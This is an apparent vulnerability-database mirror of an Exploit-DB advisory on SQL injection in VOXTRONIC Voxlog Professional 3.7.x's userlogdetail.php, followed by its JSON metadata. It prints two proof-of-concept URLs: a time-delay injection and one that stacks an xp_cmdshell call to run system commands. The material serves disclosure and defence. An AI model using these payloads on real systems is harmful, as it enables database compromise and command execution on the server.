Search...

VOXTRONIC Voxlog Professional 3.7.x userlogdetail.php idclient Parameter SQL Injection

2012-02-20T00:00:00

ID EDB-ID:36850
Type exploitdb
Reporter J. Greil
Modified 2012-02-20T00:00:00

Description

VOXTRONIC Voxlog Professional 3.7.x userlogdetail.php idclient Parameter SQL Injection. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/52081/info
 
VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
 
An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks.
 
VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected. 


http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+

http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+

JSON Vulners Source

Initial Source

{"id": "EDB-ID:36850", "hash": "fefa127760d1686b39fece24e8e2fc66", "type": "exploitdb", "bulletinFamily": "exploit", "title": "VOXTRONIC Voxlog Professional 3.7.x userlogdetail.php idclient Parameter SQL Injection", "description": "VOXTRONIC Voxlog Professional 3.7.x userlogdetail.php idclient Parameter SQL Injection. Webapps exploit for php platform", "published": "2012-02-20T00:00:00", "modified": "2012-02-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/36850/", "reporter": "J. Greil", "references": [], "cvelist": [], "lastseen": "2016-02-04T04:30:06", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2016-02-04T04:30:06"}, "dependencies": {"references": [], "modified": "2016-02-04T04:30:06"}, "vulnersScore": 0.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/36850/", "sourceData": "source: http://www.securityfocus.com/bid/52081/info\r\n \r\nVOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nAn remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks.\r\n \r\nVOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected. \r\n\r\n\r\nhttp://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+\r\n\r\nhttp://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+ ", "osvdbidlist": ["84898"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}